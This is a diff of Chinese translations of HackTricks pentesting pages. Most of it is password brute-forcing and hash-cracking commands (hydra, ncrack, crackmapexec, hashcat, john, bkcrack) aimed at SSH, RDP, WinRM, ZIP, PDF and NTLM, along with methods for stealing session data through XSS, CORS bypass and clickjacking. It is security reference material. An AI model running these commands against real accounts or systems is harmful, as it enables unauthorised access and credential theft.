- **使用防火墙**:配置防火墙规则,只允许可信的 IP 地址进行 SSH 连接。
- **使用双因素认证**:增加一个额外的认证步骤,如使用手机应用生成的一次性密码。
- 使用强密码和多因素认证。
- 限制尝试登录次数,例如使用`fail2ban`。
- 更改默认的SSH端口通常是22
- 使用SSH密钥而不是密码进行认证。
#### 工具
#### 相关资源
- **Hydra**:一个快速的密码破解工具,支持多种协议,包括 SSH。
- **Ncrack**:一种网络认证破解工具,设计用于高速暴力破解。
- **Medusa**:一种速度极快的并行暴力破解工具,支持多种服务。
通过这些工具和方法,可以有效地测试和加强 SSH 服务的安全性。
- [SSH Audit](https://www.sshaudit.com/) - 一个在线工具用于审核SSH服务器的配置和安全性。
- [fail2ban](https://www.fail2ban.org/) - 一个用于防止暴力破解的入侵防御系统。
```bash
hydra -l root -P passwords.txt [-t 32] <IP> ssh
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
@ -637,19 +581,12 @@ set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst
```bash
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
```
<figure><img src="../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 轻松构建并**自动化工作流程**,由世界上**最先进**的社区工具提供支持。
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## 本地
### 在线破解数据库
* [~~http://hashtoolkit.com/reverse-hash?~~](http://hashtoolkit.com/reverse-hash?)MD5 & SHA1
* [https://shuck.sh/get-shucking.php](https://shuck.sh/get-shucking.php)MSCHAPv2/PPTP-VPN/NetNTLMv1 带/不带 ESS/SSP 以及任挑战值)
* [https://shuck.sh/get-shucking.php](https://shuck.sh/get-shucking.php)MSCHAPv2/PPTP-VPN/NetNTLMv1 带/不带 ESS/SSP 以及任意挑战值)
* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com)哈希值、WPA2 抓包和 MSOffice、ZIP、PDF 归档文件)
* [https://crackstation.net/](https://crackstation.net)(哈希值)
* [https://md5decrypt.net/](https://md5decrypt.net)MD5
@ -660,7 +597,7 @@ crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html)MD5
* [http://reverse-hash-lookup.online-domain-tools.com/](http://reverse-hash-lookup.online-domain-tools.com)
在尝试暴力破解哈希之前,请先查看这些资源
在尝试暴力破解哈希之前,请先查看这些。
### ZIP
```bash
@ -680,7 +617,7 @@ hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
```
#### 已知明文的zip攻击
您需要知道加密zip内部包含的文件的**明文**(或部分明文)。您可以通过运行:**`7z l encrypted.zip`**来检查加密zip内部包含的**文件名和文件大小**。\
您需要知道加密zip内**包含文件的** **明文**(或部分明文)。您可以通过运行:**`7z l encrypted.zip`** 来检查加密zip内**包含文件的文件名和大小**。\
从发布页面下载 [**bkcrack**](https://github.com/kimci86/bkcrack/releases/tag/v1.4.0)。
```bash
# You need to create a zip file containing only the file that is inside the encrypted zip
@ -715,7 +652,7 @@ qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
```
### PDF所有者密码
要破解PDF所有者密码请查看此内容[https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/](https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/)
要破解PDF所有者密码请查看此链接[https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/](https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/)
### JWT
```bash
@ -769,9 +706,9 @@ cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
```
另一个Luks BF教程[http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1)
### Mysql
[http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1) 是另一个关于 Luks BF 的教程。
```bash
#John hash format
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
@ -811,19 +748,11 @@ zip -r file.xls .
# From https://github.com/crackpkcs12/crackpkcs12
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
```
<figure><img src="../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 来轻松构建并**自动化工作流程**,这些工作流程由世界上**最先进的**社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## 工具
**哈希示例:** [https://openwall.info/wiki/john/sample-hashes](https://openwall.info/wiki/john/sample-hashes)
### Hash-identifier
### 哈希识别器
```bash
hash-identifier
> <HASH>
@ -860,8 +789,8 @@ hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
```
* **Wordlist combinator** 攻击
可以使用hashcat将**两个词表合并一个**。\
如果列表1包含单词 **"hello"**第二个列表包含两行,单词分别是 **"world"** 和 **"earth"**。将会生成单词 `helloworld``helloearth`
可以使用hashcat将**两个词表合并一个**。\
如果列表1包含单词 **"hello"**第二个列表包含两行,单词分别是 **"world"** 和 **"earth"**。将会生成单词 `helloworld``helloearth`
```bash
# This will combine 2 wordlists
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
@ -904,7 +833,7 @@ hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
## Use it to crack the password
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
```
* 字典 + 掩码 (`-a 6`) / 掩码 + 字典 (`-a 7`) 攻击
* 字典 + 掩码`-a 6`/ 掩码 + 字典(`-a 7`攻击
```bash
# Mask numbers will be appended to each word in the wordlist
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d
@ -923,12 +852,54 @@ hashcat --example-hashes | grep -B1 -A2 "NTLM"
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
```
# 破解Windows哈希值
# 破解Windows哈希
Windows操作系统使用NTLM哈希来存储用户的密码。在进行密码破解时通常会从系统中提取这些哈希然后使用不同的工具和技术尝试恢复密码。以下是一些常用的方法
## 离线攻击
### 使用John the Ripper
John the Ripper是一个流行的密码破解工具支持多种哈希类型包括NTLM。要使用它破解Windows哈希你需要首先从目标系统中提取哈希然后运行John the Ripper。
```bash
john --format=NT hashes.txt
```
### 使用Hashcat
Hashcat是另一个功能强大的密码破解工具它提供了大量的选项来优化破解过程。它也支持NTLM哈希。
```bash
hashcat -m 1000 -a 0 -o cracked.txt hashes.txt wordlist.txt
```
## 在线攻击
### 使用Hydra
Hydra是一个网络登录破解工具可以对多种服务进行暴力破解或字典攻击。对于Windows远程桌面RDP可以使用如下命令
```bash
hydra -t 1 -V -f -l username -P password.txt rdp://target
```
### 使用Ncrack
Ncrack是专门设计用来破解网络认证的工具它支持多种协议包括RDP。使用Ncrack进行RDP破解的命令如下
```bash
ncrack -vv --user username --pass password.txt rdp://target
```
## 资源
- **字典文件**密码破解常用的字典文件可以在网上找到例如CrackStation或SecLists。
- **彩虹表**:彩虹表是一种预先计算好的哈希值表,用于加速密码破解过程。
- **社交工程**:有时候,通过社交工程技巧可以获得密码或提示信息,这可以作为破解的辅助手段。
在尝试这些方法时,请确保你有合法的授权,未经授权的密码破解行为可能违反法律。
```
3000 | LM | Operating-Systems
1000 | NTLM | Operating-Systems
```
破解常见应用程序哈希
# 破解常见应用程序哈希
```
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
@ -940,20 +911,22 @@ hashcat --example-hashes | grep -B1 -A2 "NTLM"
```
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零开始学习AWS黑客技术成为</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS红队专家)</strong></a><strong></strong></summary>
* 如果您在**网络安全公司**工作,想在**HackTricks**中看到您的**公司广告**,或者想要获取**PEASS最新版本或下载HackTricks的PDF**?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)系列。
* 获取[**官方PEASS & HackTricks周边商品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter**上**关注**我[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks仓库**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享您的黑客技巧。**
支持HackTricks的其他方式
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
<figure><img src="../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 轻松构建并**自动化工作流程**,由世界上**最先进**的社区工具提供支持。\
使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics\&utm_medium=banner\&utm_source=hacktricks) 轻松构建并**自动化工作流程**,由世界上**最先进**的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

42
stealing-sensitive-information-disclosure-from-a-web.md
View file

@ -1,33 +1,37 @@
# 从网页中窃取敏感信息
# 从网页中窃取敏感信息
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零开始学习AWS黑客攻击直到成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
* 你在一个**网络安全公司**工作吗你想在HackTricks中看到你的**公司广告**吗?或者你想要**获取PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
支持HackTricks的其他方式
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方的PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。**
</details>
如果你在某个时刻发现一个**网页根据你的会话显示敏感信息**也许它反射了cookie或者打印了信用卡详细信息或其他敏感信息你可以尝试窃取它。\
这里我向你介绍了几种主要的方法来尝试实现:
如果你在某个时刻发现一个**基于你的会话向你展示敏感信息的网页**可能它在反映cookies或打印信用卡细节或任何其他敏感信息你可能会尝试窃取它。\
这里我向你介绍主要的方法来尝试实现
* [**CORS绕过**](pentesting-web/cors-bypass.md):如果你可以绕过CORS头你就可以通过对恶意页面进行Ajax请求来窃取信息。
* [**XSS**](pentesting-web/xss-cross-site-scripting/)如果你在页面上发现了XSS漏洞你可利用它来窃取信息。
* [**悬挂标记**](pentesting-web/dangling-markup-html-scriptless-injection/)如果你无法注入XSS标签你仍然可以使用其他常规HTML标签来窃取信息。
* [**点击劫持**](pentesting-web/clickjacking.md):如果没有对这种攻击进行保护,你可能会成功诱使用户向你发送敏感数据(一个例子[在这里](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20))。
* [**CORS绕过**](pentesting-web/cors-bypass.md):如果你能绕过CORS头你将能够通过恶意页面执行Ajax请求来窃取信息。
* [**XSS**](pentesting-web/xss-cross-site-scripting/)如果你在页面上发现了XSS漏洞你可能能够利用它来窃取信息。
* [**悬空标记**](pentesting-web/dangling-markup-html-scriptless-injection/)如果你不能注入XSS标签你仍然可能使用其他常规HTML标签来窃取信息。
* [**点击劫持**](pentesting-web/clickjacking.md):如果没有防护措施,你可能能够诱导用户向你发送敏感数据(一个例子[这里](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20))。
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零开始学习AWS黑客攻击直到成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
* 你在一个**网络安全公司**工作吗你想在HackTricks中看到你的**公司广告**吗?或者你想要**获取PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
支持HackTricks的其他方式
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方的PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。**
</details>